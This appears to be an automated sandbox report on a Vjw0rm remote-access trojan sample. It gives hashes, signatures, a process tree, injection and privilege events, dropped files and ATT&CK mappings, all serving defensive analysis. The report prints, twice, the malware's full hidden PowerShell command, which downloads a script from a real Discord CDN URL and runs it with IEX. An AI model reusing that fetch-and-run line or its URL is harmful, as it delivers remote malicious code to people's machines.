vjw0rm | a3bda5240c364f1afd8a70384330092c99eb8d1c0133cf0c2e4e0dfaf927d6d8

General

Target

Requerimiento.exe
Size

166KB
MD5

4c8b8d244f471478ad5c6bb4babb279e
SHA1

d7a22176243764fa8e499405597d612eb36cfbbd
SHA256

a3bda5240c364f1afd8a70384330092c99eb8d1c0133cf0c2e4e0dfaf927d6d8
SHA512

608e69ea5e59b4a00359ec3dc5b65da689ff1908e6ee0ad5a8824fd774fcfb39abaedfe3c84142734a3d12019844196e0e5b4fe1f00e76c251662f4677b148ff

Score

10^/10

vjw0rm suricata trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cdn.discordapp.com/attachments/869602547248283711/877244888020840448/Main.png

Signatures

Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata

Blocklisted process makes network request 17 IoCs

Processes:

WScript.exepowershell.exe

flow	pid	process
10	968	WScript.exe
11	828	powershell.exe
12	968	WScript.exe
13	968	WScript.exe
16	968	WScript.exe
17	968	WScript.exe
19	968	WScript.exe
21	968	WScript.exe
22	968	WScript.exe
25	968	WScript.exe
29	968	WScript.exe
33	968	WScript.exe
37	968	WScript.exe
42	968	WScript.exe
45	968	WScript.exe
49	968	WScript.exe
54	968	WScript.exe

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

2.exe

pid process

1608 2.exe

pid	process
1608	2.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4.js	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4.js	WScript.exe

Loads dropped DLL 4 IoCs

Processes:

Requerimiento.exe

pid process

1076 Requerimiento.exe
1076 Requerimiento.exe
1076 Requerimiento.exe
1076 Requerimiento.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

pid	process
1076	Requerimiento.exe
1076	Requerimiento.exe
1076	Requerimiento.exe
1076	Requerimiento.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

2.exevbc.exevbc.exe

description	pid	process	target process
PID 1608 set thread context of 1912	1608	2.exe	vbc.exe
PID 1912 set thread context of 1504	1912	vbc.exe	vbc.exe
PID 1504 set thread context of 1916	1504	vbc.exe	vbc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

828 powershell.exe
828 powershell.exe

pid	process
828	powershell.exe
828	powershell.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

2.exepowershell.exevbc.exevbc.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	1608	2.exe
Token: SeDebugPrivilege	828	powershell.exe
Token: SeDebugPrivilege	1912	vbc.exe
Token: SeDebugPrivilege	1504	vbc.exe
Token: SeDebugPrivilege	1916	vbc.exe
Token: 33	1916	vbc.exe
Token: SeIncBasePriorityPrivilege	1916	vbc.exe
Token: 33	1916	vbc.exe
Token: SeIncBasePriorityPrivilege	1916	vbc.exe
Token: 33	1916	vbc.exe
Token: SeIncBasePriorityPrivilege	1916	vbc.exe
Token: 33	1916	vbc.exe
Token: SeIncBasePriorityPrivilege	1916	vbc.exe
Token: 33	1916	vbc.exe
Token: SeIncBasePriorityPrivilege	1916	vbc.exe
Token: 33	1916	vbc.exe
Token: SeIncBasePriorityPrivilege	1916	vbc.exe
Token: 33	1916	vbc.exe
Token: SeIncBasePriorityPrivilege	1916	vbc.exe
Token: 33	1916	vbc.exe
Token: SeIncBasePriorityPrivilege	1916	vbc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Requerimiento.exeWScript.execmd.exe2.exevbc.exevbc.exe

description	pid	process	target process
PID 1076 wrote to memory of 1608	1076	Requerimiento.exe	2.exe
PID 1076 wrote to memory of 1608	1076	Requerimiento.exe	2.exe
PID 1076 wrote to memory of 1608	1076	Requerimiento.exe	2.exe
PID 1076 wrote to memory of 1608	1076	Requerimiento.exe	2.exe
PID 1076 wrote to memory of 1608	1076	Requerimiento.exe	2.exe
PID 1076 wrote to memory of 1608	1076	Requerimiento.exe	2.exe
PID 1076 wrote to memory of 1608	1076	Requerimiento.exe	2.exe
PID 1076 wrote to memory of 1256	1076	Requerimiento.exe	WScript.exe
PID 1076 wrote to memory of 1256	1076	Requerimiento.exe	WScript.exe
PID 1076 wrote to memory of 1256	1076	Requerimiento.exe	WScript.exe
PID 1076 wrote to memory of 1256	1076	Requerimiento.exe	WScript.exe
PID 1076 wrote to memory of 1256	1076	Requerimiento.exe	WScript.exe
PID 1076 wrote to memory of 1256	1076	Requerimiento.exe	WScript.exe
PID 1076 wrote to memory of 1256	1076	Requerimiento.exe	WScript.exe
PID 1256 wrote to memory of 1476	1256	WScript.exe	cmd.exe
PID 1256 wrote to memory of 1476	1256	WScript.exe	cmd.exe
PID 1256 wrote to memory of 1476	1256	WScript.exe	cmd.exe
PID 1256 wrote to memory of 1476	1256	WScript.exe	cmd.exe
PID 1256 wrote to memory of 1476	1256	WScript.exe	cmd.exe
PID 1256 wrote to memory of 1476	1256	WScript.exe	cmd.exe
PID 1256 wrote to memory of 1476	1256	WScript.exe	cmd.exe
PID 1476 wrote to memory of 828	1476	cmd.exe	powershell.exe
PID 1476 wrote to memory of 828	1476	cmd.exe	powershell.exe
PID 1476 wrote to memory of 828	1476	cmd.exe	powershell.exe
PID 1476 wrote to memory of 828	1476	cmd.exe	powershell.exe
PID 1476 wrote to memory of 828	1476	cmd.exe	powershell.exe
PID 1476 wrote to memory of 828	1476	cmd.exe	powershell.exe
PID 1476 wrote to memory of 828	1476	cmd.exe	powershell.exe
PID 1076 wrote to memory of 968	1076	Requerimiento.exe	WScript.exe
PID 1076 wrote to memory of 968	1076	Requerimiento.exe	WScript.exe
PID 1076 wrote to memory of 968	1076	Requerimiento.exe	WScript.exe
PID 1076 wrote to memory of 968	1076	Requerimiento.exe	WScript.exe
PID 1076 wrote to memory of 968	1076	Requerimiento.exe	WScript.exe
PID 1076 wrote to memory of 968	1076	Requerimiento.exe	WScript.exe
PID 1076 wrote to memory of 968	1076	Requerimiento.exe	WScript.exe
PID 1608 wrote to memory of 1912	1608	2.exe	vbc.exe
PID 1608 wrote to memory of 1912	1608	2.exe	vbc.exe
PID 1608 wrote to memory of 1912	1608	2.exe	vbc.exe
PID 1608 wrote to memory of 1912	1608	2.exe	vbc.exe
PID 1608 wrote to memory of 1912	1608	2.exe	vbc.exe
PID 1608 wrote to memory of 1912	1608	2.exe	vbc.exe
PID 1608 wrote to memory of 1912	1608	2.exe	vbc.exe
PID 1608 wrote to memory of 1912	1608	2.exe	vbc.exe
PID 1608 wrote to memory of 1912	1608	2.exe	vbc.exe
PID 1608 wrote to memory of 1912	1608	2.exe	vbc.exe
PID 1608 wrote to memory of 1912	1608	2.exe	vbc.exe
PID 1608 wrote to memory of 1912	1608	2.exe	vbc.exe
PID 1912 wrote to memory of 1504	1912	vbc.exe	vbc.exe
PID 1912 wrote to memory of 1504	1912	vbc.exe	vbc.exe
PID 1912 wrote to memory of 1504	1912	vbc.exe	vbc.exe
PID 1912 wrote to memory of 1504	1912	vbc.exe	vbc.exe
PID 1912 wrote to memory of 1504	1912	vbc.exe	vbc.exe
PID 1912 wrote to memory of 1504	1912	vbc.exe	vbc.exe
PID 1912 wrote to memory of 1504	1912	vbc.exe	vbc.exe
PID 1912 wrote to memory of 1504	1912	vbc.exe	vbc.exe
PID 1912 wrote to memory of 1504	1912	vbc.exe	vbc.exe
PID 1912 wrote to memory of 1504	1912	vbc.exe	vbc.exe
PID 1912 wrote to memory of 1504	1912	vbc.exe	vbc.exe
PID 1912 wrote to memory of 1504	1912	vbc.exe	vbc.exe
PID 1504 wrote to memory of 1916	1504	vbc.exe	vbc.exe
PID 1504 wrote to memory of 1916	1504	vbc.exe	vbc.exe
PID 1504 wrote to memory of 1916	1504	vbc.exe	vbc.exe
PID 1504 wrote to memory of 1916	1504	vbc.exe	vbc.exe
PID 1504 wrote to memory of 1916	1504	vbc.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\Requerimiento.exe
"C:\Users\Admin\AppData\Local\Temp\Requerimiento.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1076

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1608

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1912

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:1256

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://cdn.discordapp.com/attachments/869602547248283711/877244888020840448/Main.png');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
3⤵
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://cdn.discordapp.com/attachments/869602547248283711/877244888020840448/Main.png');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:828

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4.js"
2⤵
- Blocklisted process makes network request
- Drops startup file
PID:968

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Persistence

Privilege Escalation

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.vbs
MD5
35054bdb043705bb9c1c8a594f69d6fb

SHA1
bce72d39604c130f8dcef8b3acf13fe8291ca476

SHA256
430328793e41c6843633bb0877aa02d7343a6f1d8fb903d4cac514031308979b

SHA512
213b0a51071fdb7e2771465095f5f7ea89eb690e37e05e4aa877314e3b3766beb26e8ef78b4ef4cd3a78f4cd6002697ff4b84740b81214cbea1c4361ef9615e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\4.js
MD5
3ed2dd265f168e2b71606ee0dfc67b43

SHA1
1ea61c18fdf136a36e600194abecf11e173c745d

SHA256
139b6fa0515cc409d3004b231b29711174c7661cc21805544ffe84c596c0feb7

SHA512
79eac0543a25539489b2c1cc20636e1f8660b4d405ebb0cab743b42de982360b191b83b40fe5a24ff4a4d3cc21872be6f45f00d4d3a88265dc199b54080a0eb8

Download Submit
\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
memory/828-88-0x0000000005330000-0x0000000005331000-memory.dmp

Filesize
4KB

Download
memory/828-107-0x0000000006270000-0x0000000006272000-memory.dmp

Filesize
8KB

Download
memory/828-105-0x0000000006470000-0x0000000006471000-memory.dmp

Filesize
4KB

Download
memory/828-108-0x0000000006290000-0x0000000006292000-memory.dmp

Filesize
8KB

Download
memory/828-104-0x00000000062B0000-0x00000000062B1000-memory.dmp

Filesize
4KB

Download
memory/828-77-0x0000000000000000-mapping.dmp

Download
memory/828-79-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

Filesize
4KB

Download
memory/828-80-0x00000000047E0000-0x00000000047E1000-memory.dmp

Filesize
4KB

Download
memory/828-81-0x00000000047A0000-0x00000000047A1000-memory.dmp

Filesize
4KB

Download
memory/828-97-0x00000000063E0000-0x00000000063E1000-memory.dmp

Filesize
4KB

Download
memory/828-83-0x00000000047A2000-0x00000000047A3000-memory.dmp

Filesize
4KB

Download
memory/828-84-0x00000000025F0000-0x00000000025F1000-memory.dmp

Filesize
4KB

Download
memory/828-96-0x0000000006230000-0x0000000006231000-memory.dmp

Filesize
4KB

Download
memory/828-106-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/828-109-0x0000000006540000-0x0000000006552000-memory.dmp

Filesize
72KB

Download
memory/828-91-0x0000000005840000-0x0000000005841000-memory.dmp

Filesize
4KB

Download
memory/968-85-0x0000000000000000-mapping.dmp

Download
memory/1076-60-0x0000000075A31000-0x0000000075A33000-memory.dmp

Filesize
8KB

Download
memory/1076-61-0x0000000000510000-0x0000000000511000-memory.dmp

Filesize
4KB

Download
memory/1256-69-0x0000000000000000-mapping.dmp

Download
memory/1476-75-0x0000000000000000-mapping.dmp

Download
memory/1504-119-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1504-132-0x00000000003D0000-0x00000000003D1000-memory.dmp

Filesize
4KB

Download
memory/1504-125-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/1504-122-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1504-120-0x0000000000402ABE-mapping.dmp

Download
memory/1608-73-0x0000000000930000-0x0000000000931000-memory.dmp

Filesize
4KB

Download
memory/1608-66-0x0000000000000000-mapping.dmp

Download
memory/1608-110-0x0000000004AC0000-0x0000000004B1F000-memory.dmp

Filesize
380KB

Download
memory/1608-111-0x0000000000420000-0x0000000000421000-memory.dmp

Filesize
4KB

Download
memory/1608-82-0x0000000000430000-0x0000000000431000-memory.dmp

Filesize
4KB

Download
memory/1912-117-0x00000000051C0000-0x00000000051C1000-memory.dmp

Filesize
4KB

Download
memory/1912-115-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1912-124-0x00000000004B0000-0x00000000004B1000-memory.dmp

Filesize
4KB

Download
memory/1912-113-0x0000000000402AAE-mapping.dmp

Download
memory/1912-112-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1916-128-0x000000000040676E-mapping.dmp

Download
memory/1916-127-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1916-130-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1916-133-0x0000000004ED0000-0x0000000004ED1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads